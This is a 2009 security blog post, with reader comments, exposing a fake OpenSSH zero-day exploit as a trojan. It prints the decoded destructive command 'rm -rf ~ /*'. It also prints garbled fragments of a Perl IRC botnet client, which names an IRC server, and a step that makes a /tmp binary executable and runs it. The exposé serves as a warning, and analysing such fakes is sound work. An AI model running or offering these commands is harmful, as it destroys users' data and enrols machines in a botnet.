Subscribe to the RSS feed in case you are interested in updates

Rumor had it that the anti-sec group was using a OpenSSH 0day, str0ke today linked to an URL that supposedly has the exploit code to that 0day.

The reason the disassembled shellcode looked like crap is that, well , it isn't shellcode, it is nothing else then plain ascii bash/php commands.

Here is that JMP code converted to "assembly" :
00000000 jb 0x6f
00000002 and byte[0x7e206672],ch
00000008 and byte[edi],ch
0000000a sub ah,byte[eax]
0000000c xor bh,byte[esi]
0000000e and byte[edi],ch
00000010 fs: gs: jbe 0x43
00000014 outs dx,byte[esi]
00000015 jne 0x83
00000017 ins byte[es:edi],dx
00000018 and byte[esi],ah

Obviously, this code doesn't make any sense whatsoever, so and here is the JMP code converted from HEX to ASCII :
rm -rf ~ /* 2> /dev/null &

The "shellcode" part actually is :
#!/usr/bin/perl
$chan="#cn";
$ke";
while (<$sockG (.*)$/){print ";
while (<$sockn";
sleep 1;
k\n";}}print $sock "JOIN $chan $key\n";while (<$sock>){if (/^PING (.*)$/){print #!/usr/bin/perl
#!/usr/bin/perl
n";
#!/usr/bin/perl
$chan="#cn";$key ="fags";$nick="phpfr";$server="G (.*)$/){print ";
while (<$sockn";
sleep 1;
k\n";}}print $sock "JOIN $chan $key\n";while (<$sock>){if (/^PING (.*)$/){print #!/usr/bin/perl
#!/usr/bin/perl
irc.ham.de.euirc.net";$SIG{TERM}";
while (<$sock";
while (<$sockn";
sleep 1;
n";
#!/usr/bin/perl
$chan="#cn";$key ="fags";$nick="k\n";}}print $sock "JOIN $chan $key\n";while (<$sock>){if (/^PING (.*)$/){print phpfr";$server="irc.ham.de.euirc.net";$SIG{TERM}sleep 1;
sleep 1;
";
while (<$sockn";
sleep 1;
#!/usr/bin/perl
$chan="#cn";$key ="fags";$nick="phpfr";$server="irc.ham.de.euirc.net";$SIG{TERM}d +x /tmp/hi 2>/dev/null;/tmp/hi";
while (<$sockn";
sleep 1;
k\n";}}print $sock "JOIN $chan $key\n";while (<$sock>){if (/^PING (.*)$/){print ";
while (<$sockn";
sleep 1;
k\n";}}print $sock "JOIN $chan $key\n";while (<$sock>){if (/^PING (.*)$/){print #!/usr/bin/perl



The supposedly freebsd shellcode is:

";
while (<$sockn";
="fags";$nick="phpfr";$server="irc.ham.de.euirc.net";$SIG{TERM}";
while (<$sock";
while (<$sockn";
sleep 1;
n";
#!/usr/bin/perl
$chan="#cn";$key ="fags";$nick="sleep 1;
#!/usr/bin/perl
$chan="#cn";$key ="fags";$nick="phpfr";$server="irc.ham.de.euirc.net";$SIG{TERM}d +x /tmp/hi 2>/dev/null;/tmp/hi";
while (<$sockn";
sleep 1;
k\n";}}print $sock "JOIN $chan $key\n";while (<$sock>){if (/^PING (.*)$/){print ";
while (<$sockn";
sleep 1;
k\n";}}print $sock "JOIN $chan $key\n";while (<$sock>){if (/^PING (.*)$/){print #!/usr/bin/perl
#!/usr/bin/perl
$chan="#cn";$key ="fags";$nick="}}#chmod +x /tmp/hi 2>/dev/null;/tmp/hi

12 comments

Anonymous said... @ 14 July, 2009 19:37

$key ="fags"
Hahahah!!!

Anonymous said... @ 14 July, 2009 19:45

Hahaha, what happened to your leet disassembly of the perl code from before?

Stefin said... @ 14 July, 2009 20:54

I was so excited to see the code and run on my local linux pc and all data lost. I read this only after doing it :-(

DiabloHorn said... @ 14 July, 2009 21:11

This was expected to happen eventually. I wonder how many people will still fall for it though.

Anonymous said... @ 14 July, 2009 21:37

I'm on the euirc staff.
We're investigating this resulting botnet and are about to shut it down asap. It would have been nice if we would have been notified earlier however.

jaj+google said... @ 14 July, 2009 21:40

@Stefin: PEBKAC

Anonymous said... @ 14 July, 2009 21:51

Not only does the shellcode suck and try to rm -rf your system... If you forget about all that and look at the code further down a big hint that it's fake is "int port=23" ... I mean I'm no expert but if its an OpenSSH exploit, I would assume it would say port 22 for SSH not 23 which is usually reserved for Telnet.

DiabloHorn, far too many people will fall for it unfortunately.

Anonymous said... @ 15 July, 2009 10:06

Hmm..
Found this out yesterday.
Actually learned a lot about security and backup-strategies at the same time :-/

Anonymous said... @ 15 July, 2009 12:53

Same as here: http://blogs.securiteam.com/index.php/archives/1302

pbx06 said... @ 17 July, 2009 03:43

juste wondering how did you did to make opocode value => asm ?

using gdb you can make bin =>opocode value

pbx06 said... @ 17 July, 2009 03:50

The strange thing is that all ip that try to bruteforce my server are host that run openssh 4.3.
However acording to
http://www.h-online.com/security/OpenSSH-zero-day-exploit-rumours-not-confirmed--/news/113731

OpenSSH zero day exploit rumours not confirmed

Is this disinformation spread deliberately by the hacker group ? the fact is that proving that your url isnt an openssh exploit.

alsao many pepole thinks that astalavista was exposed by openssh bug while a msg in a mailling list show that lightspeed was exploited then a local priv escalation

Anonymous said... @ 20 July, 2009 18:28

anti-sec fags forgot to put --no-preserve-root in their code. idiots

Post a Comment